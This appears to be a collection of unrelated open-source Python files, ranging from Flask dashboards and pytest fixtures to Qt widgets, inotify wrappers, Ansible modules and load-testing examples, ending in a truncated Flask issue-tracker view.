self.assertEqual(payload['resource'], k8s_obj['type'])
self.assertTrue('object_kind' in payload)
self.assertEqual(payload['object_kind'], k8s_obj['object']['kind'])
self.assertTrue('name' in payload)
self.assertEqual(payload['name'], k8s_obj['object']['metadata']['name'])
self.assertTrue('labels' in payload)
self.assertListEqual(payload['labels'], k8s_obj['object']['metadata']['labels'])
self.assertTrue('namespace' in payload)
self.assertEqual(payload['namespace'], k8s_obj['object']['metadata']['namespace'])
self.assertTrue('uid' in payload)
self.assertEqual(payload['uid'], k8s_obj['object']['metadata']['uid'])
def test_get_trigger_payload_from_line(self):
line = '{"object": {"kind": "president", ' + \
'"metadata": {"labels": ["rapper", "train wrecker"], ' + \
'"namespace": "westashians", ' + \
'"name": "west", "uid": "coinye"}}, "type": "kanye"}'
sensor = self.get_sensor_instance()
payload = sensor._get_trigger_payload_from_line(line)
self.assertTrue(payload is not None)
self.assertTrue('resource' in payload)
self.assertTrue('object_kind' in payload)
self.assertTrue('name' in payload)
self.assertTrue('labels' in payload)
self.assertTrue('namespace' in payload)
self.assertTrue('uid' in payload)
|
bbio/bbio.py | timgates42/PyBBIO | 102 | 10129 | <filename>bbio/bbio.py
"""
PyBBIO - bbio.py
Copyright (c) 2012-2015 - <NAME> <<EMAIL>>
Released under the MIT license
https://github.com/graycatlabs/PyBBIO
"""
import sys, atexit
from .platform import platform_init, platform_cleanup
from .common import ADDITIONAL_CLEANUP, util_init
def bbio_init():
""" Pre-run initialization, i.e. starting module clocks, etc. """
util_init()
platform_init()
def bbio_cleanup():
""" Post-run cleanup, i.e. stopping module clocks, etc. """
# Run user cleanup routines:
for cleanup in ADDITIONAL_CLEANUP:
try:
cleanup()
except Exception as e:
# Something went wrong with one of the cleanup routines, but we
# want to keep going; just print the error and continue
print "*Exception raised trying to call cleanup routine '%s':\n %s" %\
(cleanup, e)
platform_cleanup()
# The following code detects if Python is running interactively,
# and if so initializes PyBBIO on import and registers PyBBIO's
# cleanup to be called at exit, otherwise it defines the run() and
# stop() methods for the file based control flow:
import __main__
if not hasattr(__main__, '__file__'):
# We're in the interpreter, see:
# http://stackoverflow.com/questions/2356399/tell-if-python-is-in-interactive-mode
bbio_init()
print "PyBBIO initialized"
def interactive_cleanup():
bbio_cleanup()
print "Finished PyBBIO cleanup"
atexit.register(interactive_cleanup)
else:
bbio_init()
atexit.register(bbio_cleanup)
# Imported in a Python file, define run() and stop():
def run(setup, loop):
""" The main loop; must be passed a setup and a loop function.
First the setup function will be called once, then the loop
function wil be called continuously until a stop signal is
raised, e.g. CTRL-C or a call to the stop() function from
within the loop. """
try:
setup()
while (True):
loop()
except KeyboardInterrupt:
# Manual exit signal, clean up and exit happy
exit(0)
def stop():
""" Preferred way for a program to stop itself. """
raise KeyboardInterrupt # Expected happy stop condition in run()
|
tests/unit_tests/cx_core/integration/integration_test.py | clach04/controllerx | 204 | 10137 | <gh_stars>100-1000
from cx_core import integration as integration_module
from cx_core.controller import Controller
def test_get_integrations(fake_controller: Controller):
integrations = integration_module.get_integrations(fake_controller, {})
inteagration_names = {i.name for i in integrations}
assert inteagration_names == {
"z2m",
"zha",
"deconz",
"state",
"mqtt",
"lutron_caseta",
}
|
datapackage_pipelines/web/server.py | gperonato/datapackage-pipelines | 109 | 10139 | import datetime
import os
from io import BytesIO
import logging
from functools import wraps
from copy import deepcopy
from collections import Counter
import slugify
import yaml
import mistune
import requests
from flask import \
Blueprint, Flask, render_template, abort, send_file, make_response
from flask_cors import CORS
from flask_jsonpify import jsonify
from flask_basicauth import BasicAuth
from datapackage_pipelines.status import status_mgr
from datapackage_pipelines.utilities.stat_utils import user_facing_stats
YAML_DUMPER = yaml.CDumper if 'CDumper' in yaml.__dict__ else yaml.Dumper
def datestr(x):
if x is None:
return ''
return str(datetime.datetime.fromtimestamp(x))
def yamlize(x):
ret = yaml.dump(x, default_flow_style=False, Dumper=YAML_DUMPER)
return ret
markdown = mistune.Markdown(hard_wrap=True)
status = status_mgr()
def make_hierarchies(statuses):
def group(lvl):
pipelines = list(filter(lambda x: len(x['id']) == 1, lvl))
children_ = list(filter(lambda x: len(x['id']) > 1, lvl))
groups_ = {}
for child in children_:
child_key = child['id'].pop(0)
groups_.setdefault(child_key, []).append(child)
children_ = dict(
(k, group(v))
for k, v in groups_.items()
)
for p in pipelines:
p['id'] = p['id'][0]
return {
'pipelines': pipelines,
'children': children_
}
def flatten(children_):
for k, v in children_.items():
v['children'] = flatten(v['children'])
child_keys = list(v['children'].keys())
if len(child_keys) == 1 and len(v['pipelines']) == 0:
child_key = child_keys[0]
children_['/'.join([k, child_key])] = v['children'][child_key]
del children_[k]
return children_
statuses = [
{
'id': st['id'].split('/'),
'title': st.get('title'),
'stats': st.get('stats'),
'slug': st.get('slug')
}
for st in statuses
]
groups = group(statuses)
children = groups.get('children', {})
groups['children'] = flatten(children)
return groups
def basic_auth_required(view_func):
"""
A decorator that can be used to protect specific views with HTTP basic
access authentication. Conditional on having BASIC_AUTH_USERNAME and
BASIC_AUTH_PASSWORD set as env vars.
"""
@wraps(view_func)
def wrapper(*args, **kwargs):
if app.config.get('BASIC_AUTH_ACTIVE', False):
if basic_auth.authenticate():
return view_func(*args, **kwargs)
else:
return basic_auth.challenge()
else:
return view_func(*args, **kwargs)
return wrapper
blueprint = Blueprint('dpp', 'dpp')
@blueprint.route("")
@blueprint.route("<path:pipeline_path>")
@basic_auth_required
def main(pipeline_path=None):
pipeline_ids = sorted(status.all_pipeline_ids())
# If we have a pipeline_path, filter the pipeline ids.
if pipeline_path is not None:
if not pipeline_path.startswith('./'):
pipeline_path = './' + pipeline_path
pipeline_ids = [p for p in pipeline_ids if p.startswith(pipeline_path)]
statuses = []
for pipeline_id in pipeline_ids:
pipeline_status = status.get(pipeline_id)
ex = pipeline_status.get_last_execution()
success_ex = pipeline_status.get_last_successful_execution()
pipeline_obj = {
'id': pipeline_id.lstrip('./'),
'title': pipeline_status.pipeline_details.get('title'),
'stats': user_facing_stats(ex.stats) if ex else None,
'slug': slugify.slugify(pipeline_id),
'trigger': ex.trigger if ex else None,
'error_log': pipeline_status.errors(),
'state': pipeline_status.state(),
'pipeline': pipeline_status.pipeline_details,
'message': pipeline_status.state().capitalize(),
'dirty': pipeline_status.dirty(),
'runnable': pipeline_status.runnable(),
'class': {'INIT': 'primary',
'QUEUED': 'primary',
'INVALID': 'danger',
'RUNNING': 'warning',
'SUCCEEDED': 'success',
'FAILED': 'danger'
}[pipeline_status.state()],
'ended': datestr(ex.finish_time) if ex else None,
'started': datestr(ex.start_time) if ex else None,
'last_success':
datestr(success_ex.finish_time) if success_ex else None,
}
statuses.append(pipeline_obj)
def state_and_not_dirty(state, p):
return p.get('state') == state and not p.get('dirty')
def state_or_dirty(state, p):
return p.get('state') == state or p.get('dirty')
categories = [
['ALL', 'All Pipelines', lambda _, __: True],
['INVALID', "Can't start", lambda _, p: not p['runnable']],
['QUEUED', 'Waiting to run', lambda state, p: p['state'] == state],
['RUNNING', 'Running', state_and_not_dirty],
['FAILED', 'Failed Execution', state_and_not_dirty],
['SUCCEEDED', 'Successful Execution', state_and_not_dirty],
]
for item in categories:
item.append([p for p in deepcopy(statuses)
if item[2](item[0], p)])
item.append(len(item[-1]))
item.append(make_hierarchies(item[-2]))
return render_template('dashboard.html',
categories=categories,
yamlize=yamlize,
markdown=markdown)
@blueprint.route("api/raw/status")
@basic_auth_required
def pipeline_raw_api_status():
pipelines = sorted(status.all_statuses(), key=lambda x: x.get('id'))
for pipeline in pipelines:
# can get the full details from api/raw/<path:pipeline_id>
for attr in ["pipeline", "reason", "error_log"]:
if attr in pipeline:
del pipeline[attr]
return jsonify(pipelines)
@blueprint.route("api/raw/<path:pipeline_id>")
@basic_auth_required
def pipeline_raw_api(pipeline_id):
if not pipeline_id.startswith('./'):
pipeline_id = './' + pipeline_id
pipeline_status = status.get(pipeline_id)
if not pipeline_status.pipeline_details:
abort(404)
last_execution = pipeline_status.get_last_execution()
last_successful_execution = pipeline_status.get_last_successful_execution()
ret = {
"id": pipeline_id,
"cache_hash": pipeline_status.cache_hash,
"dirty": pipeline_status.dirty(),
"queued": last_execution.queue_time if last_execution else None,
"started": last_execution.start_time if last_execution else None,
"ended": last_execution.finish_time if last_execution else None,
"reason": last_execution.log if last_execution else None,
"error_log": pipeline_status.errors(),
"stats": last_execution.stats if last_execution else None,
"success": last_execution.success if last_execution else None,
"last_success":
last_successful_execution.finish_time
if last_successful_execution else None,
"trigger": last_execution.trigger if last_execution else None,
"pipeline": pipeline_status.pipeline_details,
"source": pipeline_status.source_spec,
"message": pipeline_status.state().capitalize(),
"state": pipeline_status.state(),
}
return jsonify(ret)
@blueprint.route("api/<field>/<path:pipeline_id>")
@basic_auth_required
def pipeline_api(field, pipeline_id):
if not pipeline_id.startswith('./'):
pipeline_id = './' + pipeline_id
pipeline_status = status.get(pipeline_id)
if not pipeline_status.pipeline_details:
abort(404)
ret = None
if field == 'pipeline':
ret = pipeline_status.pipeline_details
ret = yamlize(ret)
elif field == 'source':
ret = pipeline_status.source_spec
ret = yamlize(ret)
elif field == 'log':
ex = pipeline_status.get_last_execution()
ret = ex.log if ex else ''
else:
abort(400)
ret = ret.split('\n')
ret = {'text': ret}
return jsonify(ret)
def _make_badge_response(subject, text, colour):
image_url = 'https://img.shields.io/badge/{}-{}-{}.svg'.format(
subject, text, colour)
r = requests.get(image_url)
buffer_image = BytesIO(r.content)
buffer_image.seek(0)
res = make_response(send_file(buffer_image, mimetype='image/svg+xml'))
res.headers['Cache-Control'] = \
'max-age=0, no-cache, no-store, must-revalidate'
res.headers['Expires'] = '0'
return res
@blueprint.route("badge/<path:pipeline_id>")
def badge(pipeline_id):
'''An individual pipeline status'''
if not pipeline_id.startswith('./'):
pipeline_id = './' + pipeline_id
pipeline_status = status.get(pipeline_id)
status_color = 'lightgray'
if pipeline_status.pipeline_details:
status_text = pipeline_status.state().lower()
last_execution = pipeline_status.get_last_execution()
success = last_execution.success if last_execution else None
if success is True:
stats = last_execution.stats if last_execution else None
record_count = stats.get('count_of_rows')
if record_count is not None:
status_text += ' (%d records)' % record_count
status_color = 'brightgreen'
elif success is False:
status_color = 'red'
else:
status_text = "not found"
return _make_badge_response('pipeline', status_text, status_color)
@blueprint.route("badge/collection/<path:pipeline_path>")
def badge_collection(pipeline_path):
'''Status badge for a collection of pipelines.'''
all_pipeline_ids = sorted(status.all_pipeline_ids())
if not pipeline_path.startswith('./'):
pipeline_path = './' + pipeline_path
# Filter pipeline ids to only include those that start with pipeline_path.
path_pipeline_ids = \
[p for p in all_pipeline_ids if p.startswith(pipeline_path)]
statuses = []
for pipeline_id in path_pipeline_ids:
pipeline_status = status.get(pipeline_id)
if pipeline_status is None:
abort(404)
status_text = pipeline_status.state().lower()
statuses.append(status_text)
status_color = 'lightgray'
status_counter = Counter(statuses)
if status_counter:
if len(status_counter) == 1 and status_counter['succeeded'] > 0:
status_color = 'brightgreen'
elif status_counter['failed'] > 0:
status_color = 'red'
elif status_counter['failed'] == 0:
status_color = 'yellow'
status_text = \
', '.join(['{} {}'.format(v, k)
for k, v in status_counter.items()])
else:
status_text = "not found"
return _make_badge_response('pipelines', status_text, status_color)
app = Flask(__name__)
app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True
if os.environ.get('DPP_BASIC_AUTH_USERNAME', False) \
and os.environ.get('DPP_BASIC_AUTH_PASSWORD', False):
app.config['BASIC_AUTH_USERNAME'] = os.environ['DPP_BASIC_AUTH_USERNAME']
app.config['BASIC_AUTH_PASSWORD'] = os.environ['DPP_BASIC_AUTH_PASSWORD']
app.config['BASIC_AUTH_ACTIVE'] = True
basic_auth = BasicAuth(app)
CORS(app)
url_prefix = os.environ.get('DPP_BASE_PATH', '/')
if not url_prefix.endswith('/'):
url_prefix += '/'
logging.info('Serving on path %s', url_prefix)
app.register_blueprint(blueprint, url_prefix=url_prefix)
|
morepath/__init__.py | hugovk/morepath | 314 | 10144 | # flake8: noqa
"""This is the main public API of Morepath.
Additional public APIs can be imported from the :mod:`morepath.error`
and :mod:`morepath.pdbsupport` modules. For custom directive
implementations that interact with core directives for grouping or
subclassing purposes, or that need to use one of the Morepath
registries, you may need to import from :mod:`morepath.directive`.
The other submodules are considered private. If you find yourself
needing to import from them in application or extension code, please
report an issue about it on the Morepath issue tracker.
"""
from dectate import commit
from .app import App, dispatch_method
from .core import (
excview_tween_factory as EXCVIEW,
poisoned_host_header_protection_tween_factory as HOST_HEADER_PROTECTION,
model_predicate,
name_predicate,
request_method_predicate,
)
from .core import request_method_predicate as LAST_VIEW_PREDICATE
from .view import render_json, render_html, redirect
from .request import Request, Response
from .autosetup import scan, autoscan
from .authentication import Identity, IdentityPolicy, NO_IDENTITY
from .converter import Converter
from .reify import reify
from .run import run
|
examples/custom_shape/stages.py | oksumoron/locust | 18,336 | 10172 | <reponame>oksumoron/locust<filename>examples/custom_shape/stages.py
from locust import HttpUser, TaskSet, task, constant
from locust import LoadTestShape
class UserTasks(TaskSet):
@task
def get_root(self):
self.client.get("/")
class WebsiteUser(HttpUser):
wait_time = constant(0.5)
tasks = [UserTasks]
class StagesShape(LoadTestShape):
"""
A simply load test shape class that has different user and spawn_rate at
different stages.
Keyword arguments:
stages -- A list of dicts, each representing a stage with the following keys:
duration -- When this many seconds pass the test is advanced to the next stage
users -- Total user count
spawn_rate -- Number of users to start/stop per second
stop -- A boolean that can stop that test at a specific stage
stop_at_end -- Can be set to stop once all stages have run.
"""
stages = [
{"duration": 60, "users": 10, "spawn_rate": 10},
{"duration": 100, "users": 50, "spawn_rate": 10},
{"duration": 180, "users": 100, "spawn_rate": 10},
{"duration": 220, "users": 30, "spawn_rate": 10},
{"duration": 230, "users": 10, "spawn_rate": 10},
{"duration": 240, "users": 1, "spawn_rate": 1},
]
def tick(self):
run_time = self.get_run_time()
for stage in self.stages:
if run_time < stage["duration"]:
tick_data = (stage["users"], stage["spawn_rate"])
return tick_data
return None
|
docs_src/options/callback/tutorial001.py | madkinsz/typer | 7,615 | 10194 | import typer
def name_callback(value: str):
if value != "Camila":
raise typer.BadParameter("Only Camila is allowed")
return value
def main(name: str = typer.Option(..., callback=name_callback)):
typer.echo(f"Hello {name}")
if __name__ == "__main__":
typer.run(main)
|
examples/pybullet/gym/pybullet_envs/minitaur/envs/env_randomizers/minitaur_alternating_legs_env_randomizer.py | felipeek/bullet3 | 9,136 | 10221 | """Randomize the minitaur_gym_alternating_leg_env when reset() is called.
The randomization include swing_offset, extension_offset of all legs that mimics
bent legs, desired_pitch from user input, battery voltage and motor damping.
"""
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
parentdir = os.path.dirname(os.path.dirname(parentdir))
os.sys.path.insert(0, parentdir)
import numpy as np
import tf.compat.v1 as tf
from pybullet_envs.minitaur.envs import env_randomizer_base
# Absolute range.
NUM_LEGS = 4
BATTERY_VOLTAGE_RANGE = (14.8, 16.8)
MOTOR_VISCOUS_DAMPING_RANGE = (0, 0.01)
class MinitaurAlternatingLegsEnvRandomizer(env_randomizer_base.EnvRandomizerBase):
"""A randomizer that changes the minitaur_gym_alternating_leg_env."""
def __init__(self,
perturb_swing_bound=0.1,
perturb_extension_bound=0.1,
perturb_desired_pitch_bound=0.01):
super(MinitaurAlternatingLegsEnvRandomizer, self).__init__()
self.perturb_swing_bound = perturb_swing_bound
self.perturb_extension_bound = perturb_extension_bound
self.perturb_desired_pitch_bound = perturb_desired_pitch_bound
def randomize_env(self, env):
perturb_magnitude = np.random.uniform(low=-self.perturb_swing_bound,
high=self.perturb_swing_bound,
size=NUM_LEGS)
env.set_swing_offset(perturb_magnitude)
tf.logging.info("swing_offset: {}".format(perturb_magnitude))
perturb_magnitude = np.random.uniform(low=-self.perturb_extension_bound,
high=self.perturb_extension_bound,
size=NUM_LEGS)
env.set_extension_offset(perturb_magnitude)
tf.logging.info("extension_offset: {}".format(perturb_magnitude))
perturb_magnitude = np.random.uniform(low=-self.perturb_desired_pitch_bound,
high=self.perturb_desired_pitch_bound)
env.set_desired_pitch(perturb_magnitude)
tf.logging.info("desired_pitch: {}".format(perturb_magnitude))
randomized_battery_voltage = np.random.uniform(BATTERY_VOLTAGE_RANGE[0],
BATTERY_VOLTAGE_RANGE[1])
env.minitaur.SetBatteryVoltage(randomized_battery_voltage)
tf.logging.info("battery_voltage: {}".format(randomized_battery_voltage))
randomized_motor_damping = np.random.uniform(MOTOR_VISCOUS_DAMPING_RANGE[0],
MOTOR_VISCOUS_DAMPING_RANGE[1])
env.minitaur.SetMotorViscousDamping(randomized_motor_damping)
tf.logging.info("motor_damping: {}".format(randomized_motor_damping))
|
roles/openshift_health_checker/library/ocutil.py | shgriffi/openshift-ansible | 164 | 10226 | #!/usr/bin/python
"""Interface to OpenShift oc command"""
import os
import shlex
import shutil
import subprocess
from ansible.module_utils.basic import AnsibleModule
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
"""Find and return oc binary file"""
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
def main():
"""Module that executes commands on a remote OpenShift cluster"""
module = AnsibleModule(
argument_spec=dict(
namespace=dict(type="str", required=False),
config_file=dict(type="str", required=True),
cmd=dict(type="str", required=True),
extra_args=dict(type="list", default=[]),
),
)
cmd = [locate_oc_binary(), '--config', module.params["config_file"]]
if module.params["namespace"]:
cmd += ['-n', module.params["namespace"]]
cmd += shlex.split(module.params["cmd"]) + module.params["extra_args"]
failed = True
try:
cmd_result = subprocess.check_output(list(cmd), stderr=subprocess.STDOUT)
failed = False
except subprocess.CalledProcessError as exc:
cmd_result = '[rc {}] {}\n{}'.format(exc.returncode, ' '.join(exc.cmd), exc.output)
except OSError as exc:
# we get this when 'oc' is not there
cmd_result = str(exc)
module.exit_json(
changed=False,
failed=failed,
result=cmd_result,
)
if __name__ == '__main__':
main()
|
Python/swap_numbers.py | saurabhcommand/Hello-world | 1,428 | 10245 | a = 5
b = 7
a,b = b,a
print a
print b
|
minotaur/_minotaur.py | giannitedesco/minotaur | 172 | 10257 | <filename>minotaur/_minotaur.py
from typing import Dict, Tuple, Optional
from pathlib import Path
import asyncio
from ._mask import Mask
from ._event import Event
from ._base import InotifyBase
__all__ = ('Minotaur',)
class Notification:
__slots__ = (
'_path',
'_type',
'_isdir',
'_unmount',
'_qoverflow',
)
def __init__(self,
path: Path,
type: Mask,
isdir: bool,
unmount: bool,
qoverflow: bool = False):
self._path = path
self._type = type
self._isdir = bool(isdir)
self._unmount = bool(unmount)
self._qoverflow = bool(qoverflow)
@property
def isdir(self) -> bool:
return self._isdir
@property
def unmount(self) -> bool:
return self._unmount
@property
def qoverflow(self) -> bool:
return self._qoverflow
@property
def path(self) -> Path:
return self._path
def __repr__(self) -> str:
t = self._isdir and 'dir' or 'file'
return f'{type(self).__name__}({self._type.name} {t} {self._path})'
@classmethod
def create(cls, path: Path, mask: Mask) -> 'Notification':
return cls(path,
mask & Mask.EVENT_TYPE,
bool(mask & Mask.ISDIR),
bool(mask & Mask.UNMOUNT),
bool(mask & Mask.Q_OVERFLOW))
class Minotaur(InotifyBase):
"""
Fancy interface for Inotify which does questionable things like:
1. Resolve watch-descriptors back to paths (which races with renames of
original paths and can't be used safely, but other inotify packages
provide this feature, so here it is for your delectation).
2. Link rename_from/rename_to events together. This feature would be
useful but isn't yet actually implemented. Working on it...
"""
__slots__ = (
'_wdmap',
'_cmap',
)
_wdmap: Dict[int, Path]
_cmap: Dict[Tuple[int, int], Event]
def __init__(self,
blocking: bool = True,
cloexec: bool = True,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
super().__init__(blocking, cloexec, loop)
self._wdmap = {}
self._cmap = {}
def add_watch(self, p: Path, mask: Mask) -> int:
try:
wd = super().add_watch(p, mask)
except Exception:
raise
else:
self._wdmap[wd] = p.resolve()
return wd
def rm_watch(self, wd: int) -> int:
try:
return super().rm_watch(wd)
except Exception:
raise
else:
del self._wdmap[wd]
def _resolve_path(self, wd: int, name: Path) -> Path:
try:
base_dir = self._wdmap[wd]
except KeyError:
path = name
else:
path = base_dir / name
return path
def __next__(self) -> Notification:
evt = super()._next_event()
if evt is None:
raise StopIteration
# TODO: Link rename_from/rename_to together if we have them
path = self._resolve_path(evt.wd, evt.name)
return Notification.create(path, evt.mask)
async def __anext__(self) -> Notification:
evt = await super()._next_event_async()
if evt is None:
raise StopIteration
path = self._resolve_path(evt.wd, evt.name)
return Notification.create(path, evt.mask)
|
pyclustering/container/examples/__init__.py | JosephChataignon/pyclustering | 1,013 | 10258 | <reponame>JosephChataignon/pyclustering
"""!
@brief Collection of examples devoted to containers.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
""" |
tests/conftest.py | junjunjunk/torchgpipe | 532 | 10262 | <reponame>junjunjunk/torchgpipe
import pytest
import torch
@pytest.fixture(autouse=True)
def manual_seed_zero():
torch.manual_seed(0)
@pytest.fixture(scope='session')
def cuda_sleep():
# Warm-up CUDA.
torch.empty(1, device='cuda')
# From test/test_cuda.py in PyTorch.
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
def cuda_sleep(seconds):
torch.cuda._sleep(int(seconds * cycles_per_ms * 1000))
return cuda_sleep
def pytest_report_header():
return f'torch: {torch.__version__}'
|
pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 2,762 | 10289 | <reponame>hishizuka/pyqtgraph
# -*- coding: utf-8 -*-
from ..Qt import QtCore, QtGui
class DockDrop(object):
"""Provides dock-dropping methods"""
def __init__(self, allowedAreas=None):
object.__init__(self)
if allowedAreas is None:
allowedAreas = ['center', 'right', 'left', 'top', 'bottom']
self.allowedAreas = set(allowedAreas)
self.setAcceptDrops(True)
self.dropArea = None
self.overlay = DropAreaOverlay(self)
self.overlay.raise_()
def resizeOverlay(self, size):
self.overlay.resize(size)
def raiseOverlay(self):
self.overlay.raise_()
def dragEnterEvent(self, ev):
src = ev.source()
if hasattr(src, 'implements') and src.implements('dock'):
#print "drag enter accept"
ev.accept()
else:
#print "drag enter ignore"
ev.ignore()
def dragMoveEvent(self, ev):
#print "drag move"
# QDragMoveEvent inherits QDropEvent which provides posF()
# PyQt6 provides only position()
posF = ev.posF() if hasattr(ev, 'posF') else ev.position()
ld = posF.x()
rd = self.width() - ld
td = posF.y()
bd = self.height() - td
mn = min(ld, rd, td, bd)
if mn > 30:
self.dropArea = "center"
elif (ld == mn or td == mn) and mn > self.height()/3.:
self.dropArea = "center"
elif (rd == mn or ld == mn) and mn > self.width()/3.:
self.dropArea = "center"
elif rd == mn:
self.dropArea = "right"
elif ld == mn:
self.dropArea = "left"
elif td == mn:
self.dropArea = "top"
elif bd == mn:
self.dropArea = "bottom"
if ev.source() is self and self.dropArea == 'center':
#print " no self-center"
self.dropArea = None
ev.ignore()
elif self.dropArea not in self.allowedAreas:
#print " not allowed"
self.dropArea = None
ev.ignore()
else:
#print " ok"
ev.accept()
self.overlay.setDropArea(self.dropArea)
def dragLeaveEvent(self, ev):
self.dropArea = None
self.overlay.setDropArea(self.dropArea)
def dropEvent(self, ev):
area = self.dropArea
if area is None:
return
if area == 'center':
area = 'above'
self.area.moveDock(ev.source(), area, self)
self.dropArea = None
self.overlay.setDropArea(self.dropArea)
class DropAreaOverlay(QtGui.QWidget):
"""Overlay widget that draws drop areas during a drag-drop operation"""
def __init__(self, parent):
QtGui.QWidget.__init__(self, parent)
self.dropArea = None
self.hide()
self.setAttribute(QtCore.Qt.WidgetAttribute.WA_TransparentForMouseEvents)
def setDropArea(self, area):
self.dropArea = area
if area is None:
self.hide()
else:
## Resize overlay to just the region where drop area should be displayed.
## This works around a Qt bug--can't display transparent widgets over QGLWidget
prgn = self.parent().rect()
rgn = QtCore.QRect(prgn)
w = min(30, prgn.width()/3.)
h = min(30, prgn.height()/3.)
if self.dropArea == 'left':
rgn.setWidth(w)
elif self.dropArea == 'right':
rgn.setLeft(rgn.left() + prgn.width() - w)
elif self.dropArea == 'top':
rgn.setHeight(h)
elif self.dropArea == 'bottom':
rgn.setTop(rgn.top() + prgn.height() - h)
elif self.dropArea == 'center':
rgn.adjust(w, h, -w, -h)
self.setGeometry(rgn)
self.show()
self.update()
def paintEvent(self, ev):
if self.dropArea is None:
return
p = QtGui.QPainter(self)
rgn = self.rect()
p.setBrush(QtGui.QBrush(QtGui.QColor(100, 100, 255, 50)))
p.setPen(QtGui.QPen(QtGui.QColor(50, 50, 150), 3))
p.drawRect(rgn)
|
homeassistant/components/kaiterra/const.py | MrDelik/core | 30,023 | 10305 | """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"
AQI_SCALE = {
"cn": [0, 50, 100, 150, 200, 300, 400, 500],
"in": [0, 50, 100, 200, 300, 400, 500],
"us": [0, 50, 100, 150, 200, 300, 500],
}
AQI_LEVEL = {
"cn": [
"Good",
"Satisfactory",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
"in": [
"Good",
"Satisfactory",
"Moderately polluted",
"Poor",
"Very poor",
"Severe",
],
"us": [
"Good",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
}
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
AVAILABLE_UNITS = [
"x",
PERCENTAGE,
"C",
"F",
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
|
apps/project/views/issue.py | rainydaygit/testtcloudserver | 349 | 10320 | <reponame>rainydaygit/testtcloudserver
from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# 新增issue
@issue.route('/', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_create')
def issue_add_handler():
"""
@api {post} /v1/issue 新增 缺陷
@apiName CreateIssue
@apiGroup 项目
@apiDescription 新增 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 123,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, creator, modifier, handler,
issue_type, chance, level, priority, stage,title, attach, handle_status,
description, comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_create')
ret = IssueBusiness.create(system, version, project_id, module_id, creator, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_modify')
def issue_modify_handler(issue_id):
"""
@api {post} /v1/issue/{int:id} 修改 缺陷
@apiName ModifyIssue
@apiGroup 项目
@apiDescription 修改 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
